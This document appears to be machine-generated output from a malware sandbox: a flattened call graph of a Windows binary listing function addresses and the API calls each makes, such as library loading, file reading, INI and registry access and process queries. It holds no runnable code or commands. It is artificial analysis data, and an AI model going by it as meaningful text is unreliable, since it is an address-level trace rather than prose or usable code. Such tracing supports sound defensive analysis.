40e11f WriteFile UnmapViewOfFile 39068->39070 39069->39067 39070->39069 39072 40e18c 39071->39072 39073 406b90 11 API calls 39072->39073 39074 40e19f 39073->39074 39075 40e1a7 memset 39074->39075 39076 40e299 39074->39076 39081 40e1e8 39075->39081 39077 4069a3 ??3@YAXPAX ??3@YAXPAX 39076->39077 39078 40e2a4 39077->39078 39078->39044 39079 406e8f 13 API calls 39079->39081 39080 406b53 SetFilePointerEx ReadFile 39080->39081 39081->39079 39081->39080 39082 40e283 39081->39082 39083 40dd50 _wcsicmp 39081->39083 39087 40742e 8 API calls 39081->39087 39088 40aae3 wcslen wcslen _memicmp 39081->39088 39089 40e244 _snwprintf 39081->39089 39084 40e291 39082->39084 39085 40e288 ??3@YAXPAX 39082->39085 39083->39081 39086 40aa04 ??3@YAXPAX 39084->39086 39085->39084 39086->39076 39087->39081 39088->39081 39090 40a8d0 7 API calls 39089->39090 39090->39081 39092 40e2c2 39091->39092 39093 406b90 11 API calls 39092->39093 39104 40e2d3 39093->39104 39094 40e4a0 39095 4069a3 ??3@YAXPAX ??3@YAXPAX 39094->39095 39097 40e4ab 39095->39097 39096 406e8f 13 API calls 39096->39104 39097->39044 39098 406b53 SetFilePointerEx ReadFile 39098->39104 39099 40e489 39100 40aa04 ??3@YAXPAX 39099->39100 39101 40e491 39100->39101 39101->39094 39102 40e497 ??3@YAXPAX 39101->39102 39102->39094 39103 40dd50 _wcsicmp 39103->39104 39104->39094 39104->39096 39104->39098 39104->39099 39104->39103 39105 40dd50 _wcsicmp 39104->39105 39108 40742e 8 API calls 39104->39108 39109 40e3e0 memcpy 39104->39109 39110 40e3b3 wcschr 39104->39110 39111 40e3fb memcpy 39104->39111 39112 40e416 memcpy 39104->39112 39113 40e431 memcpy 39104->39113 39106 40e376 memset 39105->39106 39107 40aa29 6 API calls 39106->39107 39107->39104 39108->39104 39109->39104 39110->39104 39111->39104 39112->39104 39113->39104 39114->39029 39117 40a980 39115->39117 39116 40a8bb 39116->38954 39116->38955 39117->39116 39118 40a995 _wcsicmp 39117->39118 39119 40a99c wcscmp 39117->39119 39118->39117 39119->39117 39120->38958 39121->38962 39123 40aa23 RegEnumValueW 39122->39123 39123->38969 39123->38970 39125 405335 39124->39125 39126 40522a 39124->39126 39125->38549 39127 40b2cc 27 API calls 39126->39127 39128 405234 39127->39128 39129 40a804 8 API calls 39128->39129 39130 40523a 39129->39130 39169 40b273 39130->39169 39132 405248 _mbscpy _mbscat GetProcAddress 39133 40b273 27 API calls 39132->39133 39134 405279 39133->39134 39172 405211 GetProcAddress 39134->39172 39136 405282 39137 40b273 27 API calls 39136->39137 39138 40528f 39137->39138 39173 405211 GetProcAddress 39138->39173 39140 405298 39141 40b273 27 API calls 39140->39141 39142 4052a5 39141->39142 39174 405211 GetProcAddress 39142->39174 39144 4052ae 39145 40b273 27 API calls 39144->39145 39146 4052bb 39145->39146 39175 405211 GetProcAddress 39146->39175 39148 4052c4 39149 40b273 27 API calls 39148->39149 39150 4052d1 39149->39150 39176 405211 GetProcAddress 39150->39176 39152 4052da 39153 40b273 27 API calls 39152->39153 39154 4052e7 39153->39154 39177 405211 GetProcAddress 39154->39177 39156 4052f0 39157 40b273 27 API calls 39156->39157 39158 4052fd 39157->39158 39178 405211 GetProcAddress 39158->39178 39160 405306 39161 40b273 27 API calls 39160->39161 39162 405313 39161->39162 39179 405211 GetProcAddress 39162->39179 39164 40531c 39165 40b273 27 API calls 39164->39165 39166 405329 39165->39166 39170 40b58d 27 API calls 39169->39170 39171 40b18c 39170->39171 39171->39132 39172->39136 39173->39140 39174->39144 39175->39148 39176->39152 39177->39156 39178->39160 39179->39164 39182 405220 39 API calls 39181->39182 39183 405369 39182->39183 39183->38987 39183->38988 39184->38990 39185->38994 39186->38991 39187->38988 39189 40440c FreeLibrary 39188->39189 39190 40436d 39189->39190 39191 40a804 8 API calls 39190->39191 39192 404377 39191->39192 39193 404383 39192->39193 39194 404405 39192->39194 39195 40b273 27 API calls 39193->39195 39194->38561 39194->38563 39194->38564 39196 40438d GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043a7 GetProcAddress 39197->39198 39199 40b273 27 API calls 39198->39199 39200 4043ba GetProcAddress 39199->39200 39201 40b273 27 API calls 39200->39201 39202 4043ce GetProcAddress 39201->39202 39203 40b273 27 API calls 39202->39203 39204 4043e2 GetProcAddress 39203->39204 39205 4043f1 39204->39205 39206 4043f7 39205->39206 39207 40440c FreeLibrary 39205->39207 39206->39194 39207->39194 39209 404413 FreeLibrary 39208->39209 39210 40441e 39208->39210 39209->39210 39210->38578 39211->38569 39213 40442e 39212->39213 39214 40447e 39212->39214 39215 40b2cc 27 API calls 39213->39215 39214->38569 39216 404438 39215->39216 39217 40a804 8 API calls 39216->39217 39218 40443e 39217->39218 39219 404445 39218->39219 39220 404467 39218->39220 39221 40b273 27 API calls 39219->39221 39220->39214 39222 404475 FreeLibrary 39220->39222 39223 40444f GetProcAddress 39221->39223 39222->39214 39223->39220 39224 404460 39223->39224 39224->39220 39226 4135f6 39225->39226 39227 4135eb FreeLibrary 39225->39227 39226->38581 39227->39226 39229 4449c4 39228->39229 39230 444a52 39228->39230 39231 40b2cc 27 API calls 39229->39231 39230->38598 39230->38599 39232 4449cb 39231->39232 39233 40a804 8 API calls 39232->39233 39234 4449d1 39233->39234 39235 40b273 27 API calls 39234->39235 39236 4449dc GetProcAddress 39235->39236 39237 40b273 27 API calls 39236->39237 39238 4449f3 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a04 GetProcAddress 39239->39240 39241 40b273 27 API calls 39240->39241 39242 444a15 GetProcAddress 39241->39242 39243 40b273 27 API calls 39242->39243 39244 444a26 GetProcAddress 39243->39244 39245 40b273 27 API calls 39244->39245 39249->38609 39250->38609 39251->38609 39252->38609 39253->38600 39255 403a29 39254->39255 39269 403bed memset memset 39255->39269 39257 403ae7 39282 40b1ab ??3@YAXPAX ??3@YAXPAX 39257->39282 39258 403a3f memset 39264 403a2f 39258->39264 39260 403aef 39260->38617 39261 409b98 GetFileAttributesW 39261->39264 39262 40a8d0 7 API calls 39262->39264 39263 409d1f 6 API calls 39263->39264 39264->39257 39264->39258 39264->39261 39264->39262 39264->39263 39266 40a051 GetFileTime FindCloseChangeNotification 39265->39266 39267 4039ca CompareFileTime 39265->39267 39266->39267 39267->38617 39268->38616 39270 414c2e 16 API calls 39269->39270 39271 403c38 39270->39271 39272 409719 2 API calls 39271->39272 39273 403c3f wcscat 39272->39273 39274 414c2e 16 API calls 39273->39274 39275 403c61 39274->39275 39276 409719 2 API calls 39275->39276 39277 403c68 wcscat 39276->39277 39283 403af5 39277->39283 39280 403af5 20 API calls 39281 403c95 39280->39281 39281->39264 39282->39260 39284 403b02 39283->39284 39285 40ae18 9 API calls 39284->39285 39293 403b37 39285->39293 39286 403bdb 39288 40aebe FindClose 39286->39288 39287 40add4 wcscmp wcscmp 39287->39293 39289 403be6 39288->39289 39289->39280 39290 40ae18 9 API calls 39290->39293 39291 40ae51 9 API calls 39291->39293 39292 40aebe FindClose 39292->39293 39293->39286 39293->39287 39293->39290 39293->39291 39293->39292 39294 40a8d0 7 API calls 39293->39294 39294->39293 39296 409d1f 6 API calls 39295->39296 39297 404190 39296->39297 39310 409b98 GetFileAttributesW 39297->39310 39299 40419c 39300 4041a7 6 API calls 39299->39300 39301 40435c 39299->39301 39303 40424f 39300->39303 39301->38643 39303->39301 39304 40425e memset 39303->39304 39306 409d1f 6 API calls 39303->39306 39307 40a8ab 9 API calls 39303->39307 39311 414842 39303->39311 39304->39303 39305 404296 wcscpy 39304->39305 39305->39303 39306->39303 39308 4042b6 memset memset _snwprintf wcscpy 39307->39308 39308->39303 39309->38641 39310->39299 39314 41443e 39311->39314 39313 414866 39313->39303 39315 41444b 39314->39315 39316 414451 39315->39316 39317 4144a3 GetPrivateProfileStringW 39315->39317 39318 414491 39316->39318 39319 414455 wcschr 39316->39319 39317->39313 39321 414495 WritePrivateProfileStringW 39318->39321 39319->39318 39320 414463 _snwprintf 39319->39320 39320->39321 39321->39313 39322->38647 39324 40b2cc 27 API calls 39323->39324 39325 409615 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 409625 39326->39327 39352 409b98 GetFileAttributesW 39327->39352 39329 409634 39330 409648 39329->39330 39353 4091b8 memset 39329->39353 39332 40b2cc 27 API calls 39330->39332 39334 408801 39330->39334 39333 40965d 39332->39333 39335 409d1f 6 API calls 39333->39335 39334->38650 39334->38651 39336 40966d 39335->39336 39405 409b98 GetFileAttributesW 39336->39405 39338 40967c 39338->39334 39339 409681 39338->39339 39406 409529 72 API calls 39339->39406 39341 409690 39341->39334 39352->39329 39407 40a6e6 WideCharToMultiByte 39353->39407 39355 409202 39408 444432 39355->39408 39358 40b273 27 API calls 39359 409236 39358->39359 39454 438552 39359->39454 39362 409383 39364 40b273 27 API calls 39362->39364 39366 409399 39364->39366 39368 438552 134 API calls 39366->39368 39386 4093a3 39368->39386 39372 4094ff 39375 4251c4 137 API calls 39375->39386 39379 4093df 39383 4253cf 17 API calls 39383->39386 39385 40951d 39385->39330 39386->39372 39386->39375 39386->39379 39386->39383 39388 4093e4 39386->39388 39405->39338 39406->39341 39407->39355 39504 4438b5 39408->39504 39410 44444c 39416 409215 39410->39416 39518 415a6d 39410->39518 39412 4442e6 11 API calls 39414 44469e 39412->39414 39413 444486 39415 4444b9 memcpy 39413->39415 39453 4444a4 39413->39453 39414->39416 39418 443d90 111 API calls 39414->39418 39522 415258 39415->39522 39416->39358 39416->39385 39418->39416 39419 444524 39420 444541 39419->39420 39421 44452a 39419->39421 39525 444316 39420->39525 39422 416935 16 API calls 39421->39422 39422->39453 39425 444316 18 API calls 39426 444563 39425->39426 39453->39412 39592 438460 39454->39592 39456 409240 39456->39362 39457 4251c4 39456->39457 39604 424f07 39457->39604 39459 4251e4 39505 4438d0 39504->39505 39515 4438c9 39504->39515 39506 415378 memcpy memcpy 39505->39506 39507 4438d5 39506->39507 39508 4154e2 10 API calls 39507->39508 39509 443906 39507->39509 39507->39515 39508->39509 39510 443970 memset 39509->39510 39509->39515 39513 44398b 39510->39513 39511 4439a0 39512 415700 10 API calls 39511->39512 39511->39515 39516 4439c0 39512->39516 39513->39511 39514 41975c 10 API calls 39513->39514 39514->39511 39515->39410 39516->39515 39517 418981 10 API calls 39516->39517 39517->39515 39519 415a77 39518->39519 39520 415a8d 39519->39520 39521 415a7e memset 39519->39521 39520->39413 39521->39520 39523 4438b5 11 API calls 39522->39523 39524 41525d 39523->39524 39524->39419 39526 444328 39525->39526 39527 444423 39526->39527 39528 44434e 39526->39528 39529 4446ea 11 API calls 39527->39529 39530 432d4e memset memset memcpy 39528->39530 39536 444381 39529->39536 39531 44435a 39530->39531 39533 444375 39531->39533 39538 44438b 39531->39538 39532 432d4e memset memset memcpy 39536->39425 39538->39532 39593 41703f 11 API calls 39592->39593 39594 43847a 39593->39594 39595 43848a 39594->39595 39596 43847e 39594->39596 39598 438270 134 API calls 39595->39598 39597 4446ea 11 API calls 39596->39597 39600 438488 39597->39600 39599 4384aa 39598->39599 39599->39600 39601 424f26 123 API calls 39599->39601 39600->39456 39602 4384bb 39601->39602 39603 438270 134 API calls 39602->39603 39603->39600 39605 424f1f 39604->39605 39606 424f0c 39604->39606 39608 424eea 11 API calls 39605->39608 39607 416760 11 API calls 39606->39607 39609 424f18 39607->39609 39610 424f24 39608->39610 39609->39459 39610->39459 39661 413f4f 39634->39661 39637 413f37 K32GetModuleFileNameExW 39638 413f4a 39637->39638 39638->38710 39640 413969 wcscpy 39639->39640 39641 41396c wcschr 39639->39641 39653 413a3a 39640->39653 39641->39640 39643 41398e 39641->39643 39666 4097f7 wcslen wcslen _memicmp 39643->39666 39645 41399a 39646 4139a4 memset 39645->39646 39647 4139e6 39645->39647 39667 409dd5 GetWindowsDirectoryW wcscpy 39646->39667 39649 413a31 wcscpy 39647->39649 39650 4139ec memset 39647->39650 39649->39653 39668 409dd5 GetWindowsDirectoryW wcscpy 39650->39668 39651 4139c9 wcscpy wcscat 39651->39653 39653->38710 39654 413a11 memcpy wcscat 39654->39653 39656 413cb0 GetModuleHandleW 39655->39656 39657 413cda 39655->39657 39656->39657 39658 413cbf GetProcAddress 39656->39658 39659 413ce3 GetProcessTimes 39657->39659 39660 413cf6 39657->39660 39658->39657 39659->38712 39660->38712 39662 413f2f 39661->39662 39663 413f54 39661->39663 39662->39637 39662->39638 39664 40a804 8 API calls 39663->39664 39665 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39664->39665 39665->39662 39666->39645 39667->39651 39668->39654 39669->38732 39670->38756 39672 409cf9 GetVersionExW 39671->39672 39673 409d0a 39671->39673 39672->39673 39673->38762 39673->38766 39674->38768 39675->38771 39676->38773 39677->38838 39679 40bba5 39678->39679 39726 40cc26 39679->39726 39682 40bd4b 39747 40cc0c 39682->39747 39687 40b2cc 27 API calls 39688 40bbef 39687->39688 39754 40ccf0 _wcsicmp 39688->39754 39690 40bbf5 39690->39682 39755 40ccb4 6 API calls 39690->39755 39692 40bc26 39693 40cf04 17 API calls 39692->39693 39694 40bc2e 39693->39694 39695 40bd43 39694->39695 39696 40b2cc 27 API calls 39694->39696 39697 40cc0c 4 API calls 39695->39697 39698 40bc40 39696->39698 39697->39682 39756 40ccf0 _wcsicmp 39698->39756 39700 40bc46 39700->39695 39701 40bc61 memset memset WideCharToMultiByte 39700->39701 39757 40103c strlen 39701->39757 39703 40bcc0 39704 40b273 27 API calls 39703->39704 39705 40bcd0 memcmp 39704->39705 39705->39695 39706 40bce2 39705->39706 39707 404423 37 API calls 39706->39707 39708 40bd10 39707->39708 39708->39695 39709 40bd3a LocalFree 39708->39709 39710 40bd1f memcpy 39708->39710 39709->39695 39710->39709 39711->38853 39713 409a74 GetTempFileNameW 39712->39713 39714 409a66 GetWindowsDirectoryW 39712->39714 39713->38852 39714->39713 39715->38890 39716->38890 39717->38890 39718->38890 39719->38890 39720->38890 39721->38890 39722->38890 39723->38890 39724->38865 39725->38887 39758 4096c3 CreateFileW 39726->39758 39728 40cc34 39729 40cc3d GetFileSize 39728->39729 39737 40bbca 39728->39737 39730 40afcf 2 API calls 39729->39730 39731 40cc64 39730->39731 39759 40a2ef ReadFile 39731->39759 39733 40cc71 39760 40ab4a MultiByteToWideChar 39733->39760 39735 40cc95 FindCloseChangeNotification 39736 40b04b ??3@YAXPAX 39735->39736 39736->39737 39737->39682 39738 40cf04 39737->39738 39739 40b633 ??3@YAXPAX 39738->39739 39740 40cf14 39739->39740 39766 40b1ab ??3@YAXPAX ??3@YAXPAX 39740->39766 39742 40bbdd 39742->39682 39742->39687 39743 40cf1b 39743->39742 39745 40cfef 39743->39745 39767 40cd4b 39743->39767 39746 40cd4b 14 API calls 39745->39746 39746->39742 39748 40b633 ??3@YAXPAX 39747->39748 39749 40cc15 39748->39749 39750 40aa04 ??3@YAXPAX 39749->39750 39751 40cc1d 39750->39751 39816 40b1ab ??3@YAXPAX ??3@YAXPAX 39751->39816 39753 40b7d4 memset CreateFileW 39753->38845 39753->38846 39754->39690 39755->39692 39756->39700 39757->39703 39758->39728 39759->39733 39761 40ab6b 39760->39761 39765 40ab93 39760->39765 39762 40a9ce 4 API calls 39761->39762 39763 40ab74 39762->39763 39764 40ab7c MultiByteToWideChar 39763->39764 39764->39765 39765->39735 39766->39743 39768 40cd7b 39767->39768 39801 40aa29 39768->39801 39770 40cef5 39771 40aa04 ??3@YAXPAX 39770->39771 39772 40cefd 39771->39772 39772->39743 39774 40aa29 6 API calls 39775 40ce1d 39774->39775 39776 40aa29 6 API calls 39775->39776 39777 40ce3e 39776->39777 39778 40ce6a 39777->39778 39809 40abb7 wcslen memmove 39777->39809 39779 40ce9f 39778->39779 39812 40abb7 wcslen memmove 39778->39812 39781 40a8d0 7 API calls 39779->39781 39785 40ceb5 39781->39785 39782 40ce56 39810 40aa71 wcslen 39782->39810 39784 40ce8b 39813 40aa71 wcslen 39784->39813 39791 40a8d0 7 API calls 39785->39791 39788 40ce5e 39811 40abb7 wcslen memmove 39788->39811 39789 40ce93 39814 40abb7 wcslen memmove 39789->39814 39793 40cecb 39791->39793 39815 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39793->39815 39795 40cedd 39796 40aa04 ??3@YAXPAX 39795->39796 39797 40cee5 39796->39797 39798 40aa04 ??3@YAXPAX 39797->39798 39799 40ceed 39798->39799 39800 40aa04 ??3@YAXPAX 39799->39800 39800->39770 39802 40aa33 39801->39802 39803 40aa63 39801->39803 39804 40aa44 39802->39804 39805 40aa38 wcslen 39802->39805 39803->39770 39803->39774 39806 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39804->39806 39805->39804 39807 40aa4d 39806->39807 39807->39803 39808 40aa51 memcpy 39807->39808 39808->39803 39809->39782 39810->39788 39811->39778 39812->39784 39813->39789 39814->39779 39815->39795 39816->39753 39817->38905 39818->38913 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 39895 4148b6 FindResourceW 39896 4148f9 39895->39896 39897 4148cf SizeofResource 39895->39897 39897->39896 39898 4148e0 LoadResource 39897->39898 39898->39896 39899 4148ee LockResource 39898->39899 39899->39896 37853 415304 ??3@YAXPAX 37672 415320 realloc 37673 415340 37672->37673 37674 41534d 37672->37674 37676 416760 11 API calls 37674->37676 37676->37673 39819 427533 39823 427548 39819->39823 39832 425711 39819->39832 39820 4259da 39876 416760 11 API calls 39820->39876 39822 4275cb 39856 425506 39822->39856 39823->39822 39830 429b7a 39823->39830 39824 4260dd 39877 424251 120 API calls 39824->39877 39825 4259c2 39852 425ad6 39825->39852 39870 415c56 11 API calls 39825->39870 39882 4446ce 11 API calls 39830->39882 39832->39820 39832->39825 39835 429a4d 39832->39835 39836 422aeb memset memcpy memcpy 39832->39836 39840 4260a1 39832->39840 39846 429ac1 39832->39846 39855 425a38 39832->39855 39866 4227f0 memset memcpy 39832->39866 39867 422b84 15 API calls 39832->39867 39868 422b5d memset memcpy memcpy 39832->39868 39869 422640 13 API calls 39832->39869 39871 4241fc 11 API calls 39832->39871 39872 42413a 90 API calls 39832->39872 39837 429a66 39835->39837 39838 429a9b 39835->39838 39836->39832 39878 415c56 11 API calls 39837->39878 39842 429a96 39838->39842 39880 416760 11 API calls 39838->39880 39875 415c56 11 API calls 39840->39875 39881 424251 120 API calls 39842->39881 39845 429a7a 39879 416760 11 API calls 39845->39879 39846->39820 39846->39852 39883 415c56 11 API calls 39846->39883 39855->39825 39873 422640 13 API calls 39855->39873 39874 4226e0 12 API calls 39855->39874 39857 425554 39856->39857 39858 42554d 39856->39858 39885 422586 12 API calls 39857->39885 39884 423b34 103 API calls 39858->39884 39861 425567 39862 4255ba 39861->39862 39863 42556c memset 39861->39863 39862->39832 39864 425596 39863->39864 39864->39862 39865 4255a4 memset 39864->39865 39865->39862 39866->39832 39867->39832 39868->39832 39869->39832 39870->39820 39871->39832 39872->39832 39873->39855 39874->39855 39875->39820 39876->39824 39877->39852 39878->39845 39879->39842 39880->39842 39881->39846 39882->39846 39883->39820 39884->39857 39885->39861 39900 441b3f 39910 43a9f6 39900->39910 39902 441b61 40083 4386af memset 39902->40083 39904 44189a 39905 4418e2 39904->39905 39909 442bd4 39904->39909 39907 4418ea 39905->39907 40084 4414a9 12 API calls 39905->40084 39909->39907 40085 441409 memset 39909->40085 39911 43aa20 39910->39911 39912 43aadf 39910->39912 39911->39912 39913 43aa34 memset 39911->39913 39912->39902 39914 43aa56 39913->39914 39915 43aa4d 39913->39915 40086 43a6e7 39914->40086 40094 42c02e memset 39915->40094 39920 43aad3 40096 4169a7 11 API calls 39920->40096 39921 43aaae 39921->39912 39921->39920 39936 43aae5 39921->39936 39922 43ac18 39925 43ac47 39922->39925 40098 42bbd5 memcpy memcpy memcpy memset memcpy 39922->40098 39926 43aca8 39925->39926 40099 438eed 16 API calls 39925->40099 39930 43acd5 39926->39930 40101 4233ae 11 API calls 39926->40101 39929 43ac87 40100 4233c5 16 API calls 39929->40100 40102 423426 11 API calls 39930->40102 39934 43ace1 40103 439811 163 API calls 39934->40103 39935 43a9f6 161 API calls 39935->39936 39936->39912 39936->39922 39936->39935 40097 439bbb 22 API calls 39936->40097 39938 43acfd 39943 43ad2c 39938->39943 40104 438eed 16 API calls 39938->40104 39940 43ad19 40105 4233c5 16 API calls 39940->40105 39942 43ad58 40106 44081d 163 API calls 39942->40106 39943->39942 39946 43add9 39943->39946 40110 423426 11 API calls 39946->40110 39947 43ae3a memset 39948 43ae73 39947->39948 40111 42e1c0 147 API calls 39948->40111 39949 43adab 40108 438c4e 163 API calls 39949->40108 39950 43ad6c 39950->39912 39950->39949 40107 42370b memset memcpy memset 39950->40107 39954 43adcc 40109 440f84 12 API calls 39954->40109 39955 43ae96 40112 42e1c0 147 API calls 39955->40112 39958 43aea8 39959 43aec1 39958->39959 40113 42e199 147 API calls 39958->40113 39961 43af00 39959->39961 40114 42e1c0 147 API calls 39959->40114 39961->39912 39964 43af1a 39961->39964 39965 43b3d9 39961->39965 40115 438eed 16 API calls 39964->40115 39970 43b3f6 39965->39970 39971 43b4c8 39965->39971 39966 43b60f 39966->39912 40174 4393a5 17 API calls 39966->40174 39969 43af2f 40116 4233c5 16 API calls 39969->40116 40156 432878 12 API calls 39970->40156 39981 43b4f2 39971->39981 40162 42bbd5 memcpy memcpy memcpy memset memcpy 39971->40162 39973 43af51 40117 423426 11 API calls 39973->40117 39976 43af7d 40118 423426 11 API calls 39976->40118 39980 43af94 40119 423330 11 API calls 39980->40119 40163 43a76c 21 API calls 39981->40163 39982 43b529 40164 44081d 163 API calls 39982->40164 39983 43b462 40158 423330 11 API calls 39983->40158 39987 43b428 39987->39983 40157 432b60 16 API calls 39987->40157 39988 43afca 40120 423330 11 API calls 39988->40120 39989 43b47e 39993 43b497 39989->39993 40159 42374a memcpy memset memcpy memcpy memcpy 39989->40159 39990 43b544 39991 43b55c 39990->39991 40165 42c02e memset 39990->40165 40166 43a87a 163 API calls 39991->40166 40160 4233ae 11 API calls 39993->40160 39995 43afdb 40121 4233ae 11 API calls 39995->40121 39999 43b4b1 40161 423399 11 API calls 39999->40161 40001 43b56c 40004 43b58a 40001->40004 40167 423330 11 API calls 40001->40167 40003 43afee 40122 44081d 163 API calls 40003->40122 40168 440f84 12 API calls 40004->40168 40005 43b4c1 40170 42db80 163 API calls 40005->40170 40010 43b592 40169 43a82f 16 API calls 40010->40169 40013 43b5b4 40171 438c4e 163 API calls 40013->40171 40015 43b5cf 40172 42c02e memset 40015->40172 40017 43b005 40017->39912 40022 43b01f 40017->40022 40123 42d836 163 API calls 40017->40123 40018 43b1ef 40133 4233c5 16 API calls 40018->40133 40020 43b212 40134 423330 11 API calls 40020->40134 40022->40018 40131 423330 11 API calls 40022->40131 40132 42d71d 163 API calls 40022->40132 40024 43b087 40124 4233ae 11 API calls 40024->40124 40025 43add4 40025->39966 40173 438f86 16 API calls 40025->40173 40028 43b22a 40135 42ccb5 11 API calls 40028->40135 40031 43b23f 40136 4233ae 11 API calls 40031->40136 40032 43b10f 40127 423330 11 API calls 40032->40127 40034 43b257 40137 4233ae 11 API calls 40034->40137 40038 43b129 40128 4233ae 11 API calls 40038->40128 40039 43b26e 40138 4233ae 11 API calls 40039->40138 40042 43b09a 40042->40032 40125 42cc15 19 API calls 40042->40125 40126 4233ae 11 API calls 40042->40126 40043 43b282 40139 43a87a 163 API calls 40043->40139 40045 43b13c 40129 440f84 12 API calls 40045->40129 40047 43b29d 40140 423330 11 API calls 40047->40140 40050 43b2af 40053 43b2b8 40050->40053 40054 43b2ce 40050->40054 40051 43b15f 40130 4233ae 11 API calls 40051->40130 40141 4233ae 11 API calls 40053->40141 40142 440f84 12 API calls 40054->40142 40057 43b2c9 40144 4233ae 11 API calls 40057->40144 40058 43b2da 40143 42370b memset memcpy memset 40058->40143 40061 43b2f9 40145 423330 11 API calls 40061->40145 40063 43b30b 40146 423330 11 API calls 40063->40146 40065 43b325 40147 423399 11 API calls 40065->40147 40067 43b332 40148 4233ae 11 API calls 40067->40148 40069 43b354 40149 423399 11 API calls 40069->40149 40071 43b364 40150 43a82f 16 API calls 40071->40150 40073 43b370 40151 42db80 163 API calls 40073->40151 40075 43b380 40152 438c4e 163 API calls 40075->40152 40077 43b39e 40153 423399 11 API calls 40077->40153 40079 43b3ae 40154 43a76c 21 API calls 40079->40154 40081 43b3c3 40155 423399 11 API calls 40081->40155 40083->39904 40084->39907 40085->39909 40087 43a6f5 40086->40087 40089 43a765 40086->40089 40087->40089 40175 42a115 40087->40175 40089->39912 40095 4397fd memset 40089->40095 40092 43a73d 40092->40089 40093 42a115 147 API calls 40092->40093 40093->40089 40094->39914 40095->39921 40096->39912 40097->39936 40098->39925 40099->39929 40100->39926 40101->39930 40102->39934 40103->39938 40104->39940 40105->39943 40106->39950 40107->39949 40108->39954 40109->40025 40110->39947 40111->39955 40112->39958 40113->39959 40114->39959 40115->39969 40116->39973 40117->39976 40118->39980 40119->39988 40120->39995 40121->40003 40122->40017 40123->40024 40124->40042 40125->40042 40126->40042 40127->40038 40128->40045 40129->40051 40130->40022 40131->40022 40132->40022 40133->40020 40134->40028 40135->40031 40136->40034 40137->40039 40138->40043 40139->40047 40140->40050 40141->40057 40142->40058 40143->40057 40144->40061 40145->40063 40146->40065 40147->40067 40148->40069 40149->40071 40150->40073 40151->40075 40152->40077 40153->40079 40154->40081 40155->40025 40156->39987 40157->39983 40158->39989 40159->39993 40160->39999 40161->40005 40162->39981 40163->39982 40164->39990 40165->39991 40166->40001 40167->40004 40168->40010 40169->40005 40170->40013 40171->40015 40172->40025 40173->39966 40174->39912 40176 42a175 40175->40176 40178 42a122 40175->40178 40176->40089 40181 42b13b 147 API calls 40176->40181 40178->40176 40179 42a115 147 API calls 40178->40179 40182 43a174 40178->40182 40206 42a0a8 147 API calls 40178->40206 40179->40178 40181->40092 40196 43a196 40182->40196 40197 43a19e 40182->40197 40183 43a306 40183->40196 40226 4388c4 14 API calls 40183->40226 40186 42a115 147 API calls 40186->40197 40188 43a642 40188->40196 40230 4169a7 11 API calls 40188->40230 40192 43a635 40229 42c02e memset 40192->40229 40196->40178 40197->40183 40197->40186 40197->40196 40207 42ff8c 40197->40207 40215 415a91 40197->40215 40219 4165ff 40197->40219 40222 439504 13 API calls 40197->40222 40223 4312d0 147 API calls 40197->40223 40224 42be4c memcpy memcpy memcpy memset memcpy 40197->40224 40225 43a121 11 API calls 40197->40225 40199 4169a7 11 API calls 40200 43a325 40199->40200 40200->40188 40200->40192 40200->40196 40200->40199 40201 42b5b5 memset memcpy 40200->40201 40202 42bf4c 14 API calls 40200->40202 40205 4165ff 11 API calls 40200->40205 40227 42b63e 14 API calls 40200->40227 40228 42bfcf memcpy 40200->40228 40201->40200 40202->40200 40205->40200 40206->40178 40231 43817e 40207->40231 40209 42ff9d 40209->40197 40210 42ff99 40210->40209 40211 42ffe3 40210->40211 40212 42ffd0 40210->40212 40236 4169a7 11 API calls 40211->40236 40235 4169a7 11 API calls 40212->40235 40216 415a9d 40215->40216 40217 415ab3 40216->40217 40218 415aa4 memset 40216->40218 40217->40197 40218->40217 40385 4165a0 40219->40385 40222->40197 40223->40197 40224->40197 40225->40197 40226->40200 40227->40200 40228->40200 40229->40188 40230->40196 40232 438187 40231->40232 40234 438192 40231->40234 40237 4380f6 40232->40237 40234->40210 40235->40209 40236->40209 40239 43811f 40237->40239 40238 438164 40238->40234 40239->40238 40242 437e5e 40239->40242 40265 4300e8 memset memset memcpy 40239->40265 40266 437d3c 40242->40266 40244 437eb3 40244->40239 40245 437ea9 40245->40244 40250 437f22 40245->40250 40281 41f432 40245->40281 40248 437f06 40328 415c56 11 API calls 40248->40328 40252 437f7f 40250->40252 40253 432d4e 3 API calls 40250->40253 40251 437f95 40329 415c56 11 API calls 40251->40329 40252->40251 40254 43802b 40252->40254 40253->40252 40256 4165ff 11 API calls 40254->40256 40257 438054 40256->40257 40292 437371 40257->40292 40260 43806b 40261 438094 40260->40261 40330 42f50e 138 API calls 40260->40330 40264 437fa3 40261->40264 40331 4300e8 memset memset memcpy 40261->40331 40264->40244 40332 41f638 104 API calls 40264->40332 40265->40239 40267 437d69 40266->40267 40270 437d80 40266->40270 40333 437ccb 11 API calls 40267->40333 40269 437d76 40269->40245 40270->40269 40271 437da3 40270->40271 40272 437d90 40270->40272 40274 438460 134 API calls 40271->40274 40272->40269 40337 437ccb 11 API calls 40272->40337 40277 437dcb 40274->40277 40275 437de8 40336 424f26 123 API calls 40275->40336 40277->40275 40334 444283 13 API calls 40277->40334 40279 437dfc 40335 437ccb 11 API calls 40279->40335 40282 41f54d 40281->40282 40288 41f44f 40281->40288 40283 41f466 40282->40283 40367 41c635 memset memset 40282->40367 40283->40248 40283->40250 40288->40283 40290 41f50b 40288->40290 40338 41f1a5 40288->40338 40363 41c06f memcmp 40288->40363 40364 41f3b1 90 API calls 40288->40364 40365 41f398 86 API calls 40288->40365 40290->40282 40290->40283 40366 41c295 86 API calls 40290->40366 40368 41703f 40292->40368 40294 437399 40295 43739d 40294->40295 40297 4373ac 40294->40297 40375 4446ea 11 API calls 40295->40375 40298 416935 16 API calls 40297->40298 40299 4373ca 40298->40299 40300 438460 134 API calls 40299->40300 40305 4251c4 137 API calls 40299->40305 40309 415a91 memset 40299->40309 40312 43758f 40299->40312 40324 437584 40299->40324 40327 437d3c 135 API calls 40299->40327 40376 425433 13 API calls 40299->40376 40377 425413 17 API calls 40299->40377 40378 42533e 16 API calls 40299->40378 40379 42538f 16 API calls 40299->40379 40380 42453e 123 API calls 40299->40380 40300->40299 40301 